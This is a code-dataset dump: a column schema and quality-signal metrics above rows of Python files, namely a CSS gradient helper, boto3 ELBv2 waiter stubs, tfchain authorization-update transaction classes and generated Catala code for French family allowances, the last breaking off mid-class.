hexsha
string | size
int64 | ext
string | lang
string | max_stars_repo_path
string | max_stars_repo_name
string | max_stars_repo_head_hexsha
string | max_stars_repo_licenses
list | max_stars_count
int64 | max_stars_repo_stars_event_min_datetime
string | max_stars_repo_stars_event_max_datetime
string | max_issues_repo_path
string | max_issues_repo_name
string | max_issues_repo_head_hexsha
string | max_issues_repo_licenses
list | max_issues_count
int64 | max_issues_repo_issues_event_min_datetime
string | max_issues_repo_issues_event_max_datetime
string | max_forks_repo_path
string | max_forks_repo_name
string | max_forks_repo_head_hexsha
string | max_forks_repo_licenses
list | max_forks_count
int64 | max_forks_repo_forks_event_min_datetime
string | max_forks_repo_forks_event_max_datetime
string | content
string | avg_line_length
float64 | max_line_length
int64 | alphanum_fraction
float64 | qsc_code_num_words_quality_signal
int64 | qsc_code_num_chars_quality_signal
float64 | qsc_code_mean_word_length_quality_signal
float64 | qsc_code_frac_words_unique_quality_signal
float64 | qsc_code_frac_chars_top_2grams_quality_signal
float64 | qsc_code_frac_chars_top_3grams_quality_signal
float64 | qsc_code_frac_chars_top_4grams_quality_signal
float64 | qsc_code_frac_chars_dupe_5grams_quality_signal
float64 | qsc_code_frac_chars_dupe_6grams_quality_signal
float64 | qsc_code_frac_chars_dupe_7grams_quality_signal
float64 | qsc_code_frac_chars_dupe_8grams_quality_signal
float64 | qsc_code_frac_chars_dupe_9grams_quality_signal
float64 | qsc_code_frac_chars_dupe_10grams_quality_signal
float64 | qsc_code_frac_chars_replacement_symbols_quality_signal
float64 | qsc_code_frac_chars_digital_quality_signal
float64 | qsc_code_frac_chars_whitespace_quality_signal
float64 | qsc_code_size_file_byte_quality_signal
float64 | qsc_code_num_lines_quality_signal
float64 | qsc_code_num_chars_line_max_quality_signal
float64 | qsc_code_num_chars_line_mean_quality_signal
float64 | qsc_code_frac_chars_alphabet_quality_signal
float64 | qsc_code_frac_chars_comments_quality_signal
float64 | qsc_code_cate_xml_start_quality_signal
float64 | qsc_code_frac_lines_dupe_lines_quality_signal
float64 | qsc_code_cate_autogen_quality_signal
float64 | qsc_code_frac_lines_long_string_quality_signal
float64 | qsc_code_frac_chars_string_length_quality_signal
float64 | qsc_code_frac_chars_long_word_length_quality_signal
float64 | qsc_code_frac_lines_string_concat_quality_signal
float64 | qsc_code_cate_encoded_data_quality_signal
float64 | qsc_code_frac_chars_hex_words_quality_signal
float64 | qsc_code_frac_lines_prompt_comments_quality_signal
float64 | qsc_code_frac_lines_assert_quality_signal
float64 | qsc_codepython_cate_ast_quality_signal
float64 | qsc_codepython_frac_lines_func_ratio_quality_signal
float64 | qsc_codepython_cate_var_zero_quality_signal
bool | qsc_codepython_frac_lines_pass_quality_signal
float64 | qsc_codepython_frac_lines_import_quality_signal
float64 | qsc_codepython_frac_lines_simplefunc_quality_signal
float64 | qsc_codepython_score_lines_no_logic_quality_signal
float64 | qsc_codepython_frac_lines_print_quality_signal
float64 | qsc_code_num_words
int64 | qsc_code_num_chars
int64 | qsc_code_mean_word_length
int64 | qsc_code_frac_words_unique
null | qsc_code_frac_chars_top_2grams
int64 | qsc_code_frac_chars_top_3grams
int64 | qsc_code_frac_chars_top_4grams
int64 | qsc_code_frac_chars_dupe_5grams
int64 | qsc_code_frac_chars_dupe_6grams
int64 | qsc_code_frac_chars_dupe_7grams
int64 | qsc_code_frac_chars_dupe_8grams
int64 | qsc_code_frac_chars_dupe_9grams
int64 | qsc_code_frac_chars_dupe_10grams
int64 | qsc_code_frac_chars_replacement_symbols
int64 | qsc_code_frac_chars_digital
int64 | qsc_code_frac_chars_whitespace
int64 | qsc_code_size_file_byte
int64 | qsc_code_num_lines
int64 | qsc_code_num_chars_line_max
int64 | qsc_code_num_chars_line_mean
int64 | qsc_code_frac_chars_alphabet
int64 | qsc_code_frac_chars_comments
int64 | qsc_code_cate_xml_start
int64 | qsc_code_frac_lines_dupe_lines
int64 | qsc_code_cate_autogen
int64 | qsc_code_frac_lines_long_string
int64 | qsc_code_frac_chars_string_length
int64 | qsc_code_frac_chars_long_word_length
int64 | qsc_code_frac_lines_string_concat
null | qsc_code_cate_encoded_data
int64 | qsc_code_frac_chars_hex_words
int64 | qsc_code_frac_lines_prompt_comments
int64 | qsc_code_frac_lines_assert
int64 | qsc_codepython_cate_ast
int64 | qsc_codepython_frac_lines_func_ratio
int64 | qsc_codepython_cate_var_zero
int64 | qsc_codepython_frac_lines_pass
int64 | qsc_codepython_frac_lines_import
int64 | qsc_codepython_frac_lines_simplefunc
int64 | qsc_codepython_score_lines_no_logic
int64 | qsc_codepython_frac_lines_print
int64 | effective
string | hits
int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
b45f24a20a8a02a724a15307a9c1907ba114019f
| 130
|
py
|
Python
|
nouns/css/__init__.py
|
vcdi/nouns
|
4bec17265fcaa757446e32b57540efe9b20d8ea0
|
[
"BSD-3-Clause"
] | null | null | null |
nouns/css/__init__.py
|
vcdi/nouns
|
4bec17265fcaa757446e32b57540efe9b20d8ea0
|
[
"BSD-3-Clause"
] | null | null | null |
nouns/css/__init__.py
|
vcdi/nouns
|
4bec17265fcaa757446e32b57540efe9b20d8ea0
|
[
"BSD-3-Clause"
] | null | null | null |
def histo_bar(a, b):
return f"background: linear-gradient(to right, transparent {a}%, #eee {a}%, #eee {b}%, transparent {b}%"
| 43.333333
| 108
| 0.646154
| 20
| 130
| 4.15
| 0.7
| 0.096386
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.146154
| 130
| 2
| 109
| 65
| 0.747748
| 0
| 0
| 0
| 0
| 0.5
| 0.723077
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| false
| 0
| 0
| 0.5
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
81fc9e03ce5881a3fced02c23d0afa40268a92b8
| 930
|
py
|
Python
|
boto3_type_annotations/boto3_type_annotations/elbv2/waiter.py
|
cowboygneox/boto3_type_annotations
|
450dce1de4e066b939de7eac2ec560ed1a7ddaa2
|
[
"MIT"
] | 119
|
2018-12-01T18:20:57.000Z
|
2022-02-02T10:31:29.000Z
|
boto3_type_annotations/boto3_type_annotations/elbv2/waiter.py
|
cowboygneox/boto3_type_annotations
|
450dce1de4e066b939de7eac2ec560ed1a7ddaa2
|
[
"MIT"
] | 15
|
2018-11-16T00:16:44.000Z
|
2021-11-13T03:44:18.000Z
|
boto3_type_annotations/boto3_type_annotations/elbv2/waiter.py
|
cowboygneox/boto3_type_annotations
|
450dce1de4e066b939de7eac2ec560ed1a7ddaa2
|
[
"MIT"
] | 11
|
2019-05-06T05:26:51.000Z
|
2021-09-28T15:27:59.000Z
|
from typing import List
from typing import Dict
from botocore.waiter import Waiter
class LoadBalancerAvailable(Waiter):
def wait(self, LoadBalancerArns: List = None, Names: List = None, Marker: str = None, PageSize: int = None, WaiterConfig: Dict = None):
pass
class LoadBalancerExists(Waiter):
def wait(self, LoadBalancerArns: List = None, Names: List = None, Marker: str = None, PageSize: int = None, WaiterConfig: Dict = None):
pass
class LoadBalancersDeleted(Waiter):
def wait(self, LoadBalancerArns: List = None, Names: List = None, Marker: str = None, PageSize: int = None, WaiterConfig: Dict = None):
pass
class TargetDeregistered(Waiter):
def wait(self, TargetGroupArn: str, Targets: List = None, WaiterConfig: Dict = None):
pass
class TargetInService(Waiter):
def wait(self, TargetGroupArn: str, Targets: List = None, WaiterConfig: Dict = None):
pass
| 32.068966
| 139
| 0.7
| 109
| 930
| 5.972477
| 0.247706
| 0.09831
| 0.099846
| 0.130568
| 0.743472
| 0.743472
| 0.735791
| 0.735791
| 0.735791
| 0.735791
| 0
| 0
| 0.201075
| 930
| 28
| 140
| 33.214286
| 0.876178
| 0
| 0
| 0.555556
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.277778
| false
| 0.277778
| 0.166667
| 0
| 0.722222
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
c31a07065a140522cf5d1d54a85f2389ca0f48c1
| 14,377
|
py
|
Python
|
scripts/conversion/tfchaintypes/transactions/Authcoin.py
|
threefoldadmin/tft-stellar
|
78b3b0b6f35435b3ed068b60c0cf6198612bb21f
|
[
"Apache-2.0"
] | 7
|
2020-02-05T16:10:46.000Z
|
2021-04-28T10:39:20.000Z
|
scripts/conversion/tfchaintypes/transactions/Authcoin.py
|
threefoldadmin/tft-stellar
|
78b3b0b6f35435b3ed068b60c0cf6198612bb21f
|
[
"Apache-2.0"
] | 379
|
2020-01-13T10:22:21.000Z
|
2022-03-23T08:59:57.000Z
|
scripts/conversion/tfchaintypes/transactions/Authcoin.py
|
threefoldadmin/tft-stellar
|
78b3b0b6f35435b3ed068b60c0cf6198612bb21f
|
[
"Apache-2.0"
] | 3
|
2020-01-24T09:56:44.000Z
|
2020-08-03T21:02:38.000Z
|
import random
from .Base import TransactionBaseClass, TransactionVersion
from ..FulfillmentTypes import FulfillmentBaseClass, FulfillmentSingleSignature, FulfillmentFactory
from ..ConditionTypes import ConditionBaseClass, ConditionNil, UnlockHash
from ..PrimitiveTypes import BinaryData, Currency
from ..IO import CoinInput, CoinOutput
def _generateXByteID(x):
out = bytearray()
for i in range(0, x):
out.append(random.randint(0, 255))
return out
class TransactionV176(TransactionBaseClass):
_SPECIFIER = b"auth addr update"
def __init__(self):
self._nonce = BinaryData(_generateXByteID(8), strencoding="base64")
self._auth_fulfillment = None
self._auth_addresses = []
self._deauth_addresses = []
self._data = None
self._miner_fees = []
# current mint condition
self._parent_auth_condition = None
super().__init__()
@property
def version(self):
return TransactionVersion.AUTH_ADDRESS_UPDATE
@property
def data(self):
"""
Optional binary data attached to this Transaction,
with a max length of 83 bytes.
"""
if self._data is None:
return BinaryData(strencoding="base64")
return self._data
@data.setter
def data(self, value):
if value is None:
self._data = None
return
if isinstance(value, BinaryData):
value = value.value
elif isinstance(value, str):
value = value.encode("utf-8")
if len(value) > 83:
raise Exception(
"arbitrary data can have a maximum bytes length of 83, {} exceeds this limit".format(len(value))
)
self._data = BinaryData(value=value, strencoding="base64")
@property
def auth_addresses(self):
"""
Unlock hashes to be authorized by this transaction
"""
return self._auth_addresses
@auth_addresses.setter
def auth_addresses(self, value):
self._auth_addresses = []
if not value:
return
for uh in value:
self.auth_addresses_add(uh)
def auth_addresses_add(self, uh):
if isinstance(uh, UnlockHash):
self._auth_addresses.append(uh)
elif isinstance(uh, str):
self._auth_addresses.append(UnlockHash.from_json(uh))
else:
raise Exception("invalid type of uh {} (expected: UnlockHash or str)".format(type(uh)))
@property
def deauth_addresses(self):
"""
Unlock hashes to be deauthorized by this transaction
"""
return self._deauth_addresses
@deauth_addresses.setter
def deauth_addresses(self, value):
self._deauth_addresses = []
if not value:
return
for uh in value:
self.deauth_addresses_add(uh)
def deauth_addresses_add(self, uh):
if isinstance(uh, UnlockHash):
self._deauth_addresses.append(uh)
elif isinstance(uh, str):
self._deauth_addresses.append(UnlockHash.from_json(uh))
else:
raise Exception("invalid type of uh {} (expected: UnlockHash or str)".format(type(uh)))
def auth_fulfillment_defined(self):
return self._auth_fulfillment is not None
@property
def auth_fulfillment(self):
"""
Retrieve the current auth fulfillment
"""
if self._auth_fulfillment is None:
return FulfillmentSingleSignature()
return self._auth_fulfillment
@auth_fulfillment.setter
def auth_fulfillment(self, value):
if value is None:
self._auth_fulfillment = None
return
if not isinstance(value, FulfillmentBaseClass):
raise Exzception(
"AuthAddressUpdate (v176) Transaction's auth fulfillment has to be a subtype of FulfillmentBaseClass, not {}".format(
type(value)
)
)
self._auth_fulfillment = value
@property
def parent_auth_condition(self):
"""
Retrieve the parent auth condition which will be set
"""
if self._parent_auth_condition is None:
return ConditionNil()
return self._parent_auth_condition
@parent_auth_condition.setter
def parent_auth_condition(self, value):
if value is None:
self._parent_auth_condition = None
return
if not isinstance(value, ConditionBaseClass):
raise Exception(
"AuthAddressUpdate (v176) Transaction's parent auth condition has to be a subtype of ConditionBaseClass, not {}".format(
type(value)
)
)
self._parent_auth_condition = value
def miner_fee_add(self, value):
self._miner_fees.append(Currency(value=value))
@property
def miner_fees(self):
"""
Miner fees, paid to the block creator of this Transaction,
funded by this Transaction's coin inputs.
"""
return self._miner_fees
def _signature_hash_input_get(self, *extra_objects):
e = j.data.rivine.encoder_sia_get()
# encode the transaction version
e.add_byte(self.version)
# encode the specifier
e.add_array(TransactionV176._SPECIFIER)
# encode nonce
e.add_array(self._nonce.value)
# extra objects if any
# TODO: is this needed??
if extra_objects:
e.add_all(*extra_objects)
# encode auth addresses
e.add_slice(self.auth_addresses)
# encode deauth addresses
e.add_slice(self.deauth_addresses)
# encode miner fees
e.add_slice(self.miner_fees)
# encode custom data
e.add(self.data)
# return the encoded data
return e.data
def _id_input_compute(self):
return bytearray(TransactionV176._SPECIFIER) + self._binary_encode_data()
def _binary_encode_data(self):
encoder = j.data.rivine.encoder_rivine_get()
encoder.add_array(self._nonce.value)
encoder.add_all(self.auth_addresses, self.deauth_addresses, self.data, self.auth_fulfillment, self.miner_fees)
return encoder.data
def _from_json_data_object(self, data):
self._nonce = BinaryData.from_json(data.get("nonce", ""), strencoding="base64")
self._auth_addresses = [UnlockHash.from_json(uh) for uh in data.get("authaddresses", []) or []]
self._deauth_addresses = [UnlockHash.from_json(uh) for uh in data.get("deauthaddresses", []) or []]
self._auth_fulfillment = FulfillmentFactory.from_json(data.get("authfulfillment", {}))
self._miner_fees = [Currency.from_json(fee) for fee in data.get("minerfees", []) or []]
self._data = BinaryData.from_json(data.get("arbitrarydata", None) or "", strencoding="base64")
def _json_data_object(self):
return {
"nonce": self._nonce.json(),
"authaddresses": [uh.json() for uh in self.auth_addresses],
"deauthaddresses": [uh.json() for uh in self.deauth_addresses],
"arbitrarydata": self.data.json(),
"authfulfillment": self.auth_fulfillment.json(),
"minerfees": [fee.json() for fee in self._miner_fees],
}
def _extra_signature_requests_new(self):
if self._parent_auth_condition is None:
return [] # nothing to be signed
return self._auth_fulfillment.signature_requests_new(
input_hash_func=self.signature_hash_get, # no extra objects are to be included within txn scope
parent_condition=self._parent_auth_condition,
)
def _extra_is_fulfilled(self):
if self._parent_auth_condition is None:
return False
return self.auth_fulfillment.is_fulfilled(parent_condition=self._parent_auth_condition)
class TransactionV177(TransactionBaseClass):
_SPECIFIER = b"auth cond update"
def __init__(self):
self._nonce = BinaryData(j.data.idgenerator.generateXByteID(8), strencoding="base64")
self._auth_fulfillment = None
self._auth_condition = None
self._data = None
self._miner_fees = []
# current auth condition
self._parent_auth_condition = None
super().__init__()
@property
def version(self):
return TransactionVersion.AUTH_CONDITION_UPDATE
@property
def data(self):
"""
Optional binary data attached to this Transaction,
with a max length of 83 bytes.
"""
if self._data is None:
return BinaryData(strencoding="base64")
return self._data
@data.setter
def data(self, value):
if value is None:
self._data = None
return
if isinstance(value, BinaryData):
value = value.value
elif isinstance(value, str):
value = value.encode("utf-8")
if len(value) > 83:
raise Exception(
"arbitrary data can have a maximum bytes length of 83, {} exceeds this limit".format(len(value))
)
self._data = BinaryData(value=value, strencoding="base64")
@property
def auth_condition(self):
"""
Retrieve the new auth condition which will be set
"""
if self._auth_condition is None:
return ConditionNil()
return self._auth_condition
@auth_condition.setter
def auth_condition(self, value):
if value is None:
self._auth_condition = None
return
if not isinstance(value, ConditionBaseClass):
raise Exception(
"AuthConditionDefinition (v177) Transaction's auth condition has to be a subtype of ConditionBaseClass, not {}".format(
type(value)
)
)
self._auth_condition = value
@property
def parent_auth_condition(self):
"""
Retrieve the parent auth condition which will be set
"""
if self._parent_auth_condition is None:
return ConditionNil()
return self._parent_auth_condition
@parent_auth_condition.setter
def parent_auth_condition(self, value):
if value is None:
self._parent_auth_condition = None
return
if not isinstance(value, ConditionBaseClass):
raise Exception(
"AuthCondtionDefinition (v177) Transaction's parent auth condition has to be a subtype of ConditionBaseClass, not {}".format(
type(value)
)
)
self._parent_auth_condition = value
def auth_fulfillment_defined(self):
return self._auth_fulfillment is not None
@property
def auth_fulfillment(self):
"""
Retrieve the current auth fulfillment
"""
if self._auth_fulfillment is None:
return FulfillmentSingleSignature()
return self._auth_fulfillment
@auth_fulfillment.setter
def auth_fulfillment(self, value):
if value is None:
self._auth_fulfillment = None
return
if not isinstance(value, FulfillmentBaseClass):
raise Exception(
"AuthConditionDefinition (v177) Transaction's auth fulfillment has to be a subtype of FulfillmentBaseClass, not {}".format(
type(value)
)
)
self._auth_fulfillment = value
def miner_fee_add(self, value):
self._miner_fees.append(Currency(value=value))
@property
def miner_fees(self):
"""
Miner fees, paid to the block creator of this Transaction,
funded by this Transaction's coin inputs.
"""
return self._miner_fees
def _signature_hash_input_get(self, *extra_objects):
e = j.data.rivine.encoder_sia_get()
# encode the transaction version
e.add_byte(self.version)
# encode the specifier
e.add_array(TransactionV177._SPECIFIER)
# encode nonce
e.add_array(self._nonce.value)
# extra objects if any
if extra_objects:
e.add_all(*extra_objects)
# encode new mint condition
e.add(self.auth_condition)
# encode custom data
e.add(self.data)
# encode miner fees
e.add_slice(self.miner_fees)
# return the encoded data
return e.data
def _id_input_compute(self):
return bytearray(TransactionV177._SPECIFIER) + self._binary_encode_data()
def _binary_encode_data(self):
encoder = j.data.rivine.encoder_rivine_get()
encoder.add_array(self._nonce.value)
encoder.add_all(self.data, self.auth_condition, self.auth_fulfillment, self.miner_fees)
return encoder.data
def _from_json_data_object(self, data):
self._nonce = BinaryData.from_json(data.get("nonce", ""), strencoding="base64")
self._auth_condition = j.clients.tfchain.types.conditions.from_json(data.get("authcondition", {}))
self._auth_fulfillment = j.clients.tfchain.types.fulfillments.from_json(data.get("authfulfillment", {}))
self._miner_fees = [Currency.from_json(fee) for fee in data.get("minerfees", []) or []]
self._data = BinaryData.from_json(data.get("arbitrarydata", None) or "", strencoding="base64")
def _json_data_object(self):
return {
"nonce": self._nonce.json(),
"authfulfillment": self.auth_fulfillment.json(),
"authcondition": self.auth_condition.json(),
"minerfees": [fee.json() for fee in self._miner_fees],
"arbitrarydata": self.data.json(),
}
def _extra_signature_requests_new(self):
if self._parent_auth_condition is None:
return [] # nothing to be signed
return self._auth_fulfillment.signature_requests_new(
input_hash_func=self.signature_hash_get, # no extra objects are to be included within txn scope
parent_condition=self._parent_auth_condition,
)
def _extra_is_fulfilled(self):
if self._parent_auth_condition is None:
return False
return self.auth_fulfillment.is_fulfilled(parent_condition=self._parent_auth_condition)
| 33.512821
| 141
| 0.630243
| 1,618
| 14,377
| 5.370828
| 0.111867
| 0.065823
| 0.06122
| 0.047641
| 0.83786
| 0.822325
| 0.802532
| 0.772727
| 0.74557
| 0.713003
| 0
| 0.007198
| 0.284969
| 14,377
| 428
| 142
| 33.591122
| 0.838132
| 0.089379
| 0
| 0.731544
| 0
| 0
| 0.090589
| 0.008605
| 0
| 0
| 0
| 0.002336
| 0
| 1
| 0.151007
| false
| 0
| 0.020134
| 0.026846
| 0.345638
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
c32041b96f53225e614982e7f87d28f5db514010
| 317,800
|
py
|
Python
|
french_law/python/src/allocations_familiales.py
|
isovector/catala
|
5663c616fdb124ac469f72cd5429fe92cdde1ed0
|
[
"Apache-2.0"
] | null | null | null |
french_law/python/src/allocations_familiales.py
|
isovector/catala
|
5663c616fdb124ac469f72cd5429fe92cdde1ed0
|
[
"Apache-2.0"
] | null | null | null |
french_law/python/src/allocations_familiales.py
|
isovector/catala
|
5663c616fdb124ac469f72cd5429fe92cdde1ed0
|
[
"Apache-2.0"
] | null | null | null |
# This file has been generated by the Catala compiler, do not edit!
from .catala import *
from typing import Any, List, Callable, Tuple
from enum import Enum
class PriseEnCharge_Code(Enum):
GardeAlterneePartageAllocations = 0
GardeAlterneeAllocataireUnique = 1
EffectiveEtPermanente = 2
ServicesSociauxAllocationVerseeALaFamille = 3
ServicesSociauxAllocationVerseeAuxServicesSociaux = 4
class PriseEnCharge:
def __init__(self, code: PriseEnCharge_Code, value: Any) -> None:
self.code = code
self.value = value
def __eq__(self, other: object) -> bool:
if isinstance(other, PriseEnCharge):
return self.code == other.code and self.value == other.value
else:
return False
def __ne__(self, other: object) -> bool:
return not (self == other)
def __str__(self) -> str:
return "{}({})".format(self.code, self.value)
class SituationObligationScolaire_Code(Enum):
Avant = 0
Pendant = 1
Apres = 2
class SituationObligationScolaire:
def __init__(self, code: SituationObligationScolaire_Code, value: Any) -> None:
self.code = code
self.value = value
def __eq__(self, other: object) -> bool:
if isinstance(other, SituationObligationScolaire):
return self.code == other.code and self.value == other.value
else:
return False
def __ne__(self, other: object) -> bool:
return not (self == other)
def __str__(self) -> str:
return "{}({})".format(self.code, self.value)
class Collectivite_Code(Enum):
Guadeloupe = 0
Guyane = 1
Martinique = 2
LaReunion = 3
SaintBarthelemy = 4
SaintMartin = 5
Metropole = 6
SaintPierreEtMiquelon = 7
Mayotte = 8
class Collectivite:
def __init__(self, code: Collectivite_Code, value: Any) -> None:
self.code = code
self.value = value
def __eq__(self, other: object) -> bool:
if isinstance(other, Collectivite):
return self.code == other.code and self.value == other.value
else:
return False
def __ne__(self, other: object) -> bool:
return not (self == other)
def __str__(self) -> str:
return "{}({})".format(self.code, self.value)
class PriseEnCompte_Code(Enum):
Complete = 0
Partagee = 1
Zero = 2
class PriseEnCompte:
def __init__(self, code: PriseEnCompte_Code, value: Any) -> None:
self.code = code
self.value = value
def __eq__(self, other: object) -> bool:
if isinstance(other, PriseEnCompte):
return self.code == other.code and self.value == other.value
else:
return False
def __ne__(self, other: object) -> bool:
return not (self == other)
def __str__(self) -> str:
return "{}({})".format(self.code, self.value)
class VersementAllocations_Code(Enum):
Normal = 0
AllocationVerseeAuxServicesSociaux = 1
class VersementAllocations:
def __init__(self, code: VersementAllocations_Code, value: Any) -> None:
self.code = code
self.value = value
def __eq__(self, other: object) -> bool:
if isinstance(other, VersementAllocations):
return self.code == other.code and self.value == other.value
else:
return False
def __ne__(self, other: object) -> bool:
return not (self == other)
def __str__(self) -> str:
return "{}({})".format(self.code, self.value)
class ElementPrestationsFamiliales_Code(Enum):
PrestationAccueilJeuneEnfant = 0
AllocationsFamiliales = 1
ComplementFamilial = 2
AllocationLogement = 3
AllocationEducationEnfantHandicape = 4
AllocationSoutienFamilial = 5
AllocationRentreeScolaire = 6
AllocationJournalierePresenceParentale = 7
class ElementPrestationsFamiliales:
def __init__(self, code: ElementPrestationsFamiliales_Code, value: Any) -> None:
self.code = code
self.value = value
def __eq__(self, other: object) -> bool:
if isinstance(other, ElementPrestationsFamiliales):
return self.code == other.code and self.value == other.value
else:
return False
def __ne__(self, other: object) -> bool:
return not (self == other)
def __str__(self) -> str:
return "{}({})".format(self.code, self.value)
class EnfantEntree:
def __init__(self, d_identifiant: Integer, d_remuneration_mensuelle: Money, d_date_de_naissance: Date, d_prise_en_charge: PriseEnCharge, d_a_deja_ouvert_droit_aux_allocations_familiales: bool) -> None:
self.d_identifiant = d_identifiant
self.d_remuneration_mensuelle = d_remuneration_mensuelle
self.d_date_de_naissance = d_date_de_naissance
self.d_prise_en_charge = d_prise_en_charge
self.d_a_deja_ouvert_droit_aux_allocations_familiales = d_a_deja_ouvert_droit_aux_allocations_familiales
def __eq__(self, other: object) -> bool:
if isinstance(other, EnfantEntree):
return (self.d_identifiant == other.d_identifiant and
self.d_remuneration_mensuelle == other.d_remuneration_mensuelle and
self.d_date_de_naissance == other.d_date_de_naissance and
self.d_prise_en_charge == other.d_prise_en_charge and
self.d_a_deja_ouvert_droit_aux_allocations_familiales == other.d_a_deja_ouvert_droit_aux_allocations_familiales)
else:
return False
def __ne__(self, other: object) -> bool:
return not (self == other)
def __str__(self) -> str:
return "EnfantEntree(d_identifiant={},d_remuneration_mensuelle={},d_date_de_naissance={},d_prise_en_charge={},d_a_deja_ouvert_droit_aux_allocations_familiales={})".format(self.d_identifiant,
self.d_remuneration_mensuelle, self.d_date_de_naissance,
self.d_prise_en_charge,
self.d_a_deja_ouvert_droit_aux_allocations_familiales)
class Enfant:
def __init__(self, identifiant: Integer, obligation_scolaire: SituationObligationScolaire, remuneration_mensuelle: Money, date_de_naissance: Date, age: Integer, prise_en_charge: PriseEnCharge, a_deja_ouvert_droit_aux_allocations_familiales: bool) -> None:
self.identifiant = identifiant
self.obligation_scolaire = obligation_scolaire
self.remuneration_mensuelle = remuneration_mensuelle
self.date_de_naissance = date_de_naissance
self.age = age
self.prise_en_charge = prise_en_charge
self.a_deja_ouvert_droit_aux_allocations_familiales = a_deja_ouvert_droit_aux_allocations_familiales
def __eq__(self, other: object) -> bool:
if isinstance(other, Enfant):
return (self.identifiant == other.identifiant and
self.obligation_scolaire == other.obligation_scolaire and
self.remuneration_mensuelle == other.remuneration_mensuelle and
self.date_de_naissance == other.date_de_naissance and
self.age == other.age and
self.prise_en_charge == other.prise_en_charge and
self.a_deja_ouvert_droit_aux_allocations_familiales == other.a_deja_ouvert_droit_aux_allocations_familiales)
else:
return False
def __ne__(self, other: object) -> bool:
return not (self == other)
def __str__(self) -> str:
return "Enfant(identifiant={},obligation_scolaire={},remuneration_mensuelle={},date_de_naissance={},age={},prise_en_charge={},a_deja_ouvert_droit_aux_allocations_familiales={})".format(self.identifiant,
self.obligation_scolaire, self.remuneration_mensuelle,
self.date_de_naissance, self.age, self.prise_en_charge,
self.a_deja_ouvert_droit_aux_allocations_familiales)
class SmicOut:
def __init__(self, brut_horaire_out: Money) -> None:
self.brut_horaire_out = brut_horaire_out
def __eq__(self, other: object) -> bool:
if isinstance(other, SmicOut):
return (self.brut_horaire_out == other.brut_horaire_out)
else:
return False
def __ne__(self, other: object) -> bool:
return not (self == other)
def __str__(self) -> str:
return "SmicOut(brut_horaire_out={})".format(self.brut_horaire_out)
class SmicIn:
def __init__(self, date_courante_in: Date, residence_in: Collectivite) -> None:
self.date_courante_in = date_courante_in
self.residence_in = residence_in
def __eq__(self, other: object) -> bool:
if isinstance(other, SmicIn):
return (self.date_courante_in == other.date_courante_in and
self.residence_in == other.residence_in)
else:
return False
def __ne__(self, other: object) -> bool:
return not (self == other)
def __str__(self) -> str:
return "SmicIn(date_courante_in={},residence_in={})".format(self.date_courante_in,
self.residence_in)
class PrestationsFamilialesOut:
def __init__(self, droit_ouvert_out: Callable[[Enfant], bool], conditions_hors_age_out: Callable[[Enfant], bool], age_l512_3_2_out: Integer, regime_outre_mer_l751_1_out: bool, base_mensuelle_out: Money) -> None:
self.droit_ouvert_out = droit_ouvert_out
self.conditions_hors_age_out = conditions_hors_age_out
self.age_l512_3_2_out = age_l512_3_2_out
self.regime_outre_mer_l751_1_out = regime_outre_mer_l751_1_out
self.base_mensuelle_out = base_mensuelle_out
def __eq__(self, other: object) -> bool:
if isinstance(other, PrestationsFamilialesOut):
return (self.droit_ouvert_out == other.droit_ouvert_out and
self.conditions_hors_age_out == other.conditions_hors_age_out and
self.age_l512_3_2_out == other.age_l512_3_2_out and
self.regime_outre_mer_l751_1_out == other.regime_outre_mer_l751_1_out and
self.base_mensuelle_out == other.base_mensuelle_out)
else:
return False
def __ne__(self, other: object) -> bool:
return not (self == other)
def __str__(self) -> str:
return "PrestationsFamilialesOut(droit_ouvert_out={},conditions_hors_age_out={},age_l512_3_2_out={},regime_outre_mer_l751_1_out={},base_mensuelle_out={})".format(self.droit_ouvert_out,
self.conditions_hors_age_out, self.age_l512_3_2_out,
self.regime_outre_mer_l751_1_out, self.base_mensuelle_out)
class PrestationsFamilialesIn:
def __init__(self, date_courante_in: Date, prestation_courante_in: ElementPrestationsFamiliales, residence_in: Collectivite) -> None:
self.date_courante_in = date_courante_in
self.prestation_courante_in = prestation_courante_in
self.residence_in = residence_in
def __eq__(self, other: object) -> bool:
if isinstance(other, PrestationsFamilialesIn):
return (self.date_courante_in == other.date_courante_in and
self.prestation_courante_in == other.prestation_courante_in and
self.residence_in == other.residence_in)
else:
return False
def __ne__(self, other: object) -> bool:
return not (self == other)
def __str__(self) -> str:
return "PrestationsFamilialesIn(date_courante_in={},prestation_courante_in={},residence_in={})".format(self.date_courante_in,
self.prestation_courante_in, self.residence_in)
class AllocationFamilialesAvril2008Out:
def __init__(self, age_minimum_alinea_1_l521_3_out: Integer) -> None:
self.age_minimum_alinea_1_l521_3_out = age_minimum_alinea_1_l521_3_out
def __eq__(self, other: object) -> bool:
if isinstance(other, AllocationFamilialesAvril2008Out):
return (self.age_minimum_alinea_1_l521_3_out == other.age_minimum_alinea_1_l521_3_out)
else:
return False
def __ne__(self, other: object) -> bool:
return not (self == other)
def __str__(self) -> str:
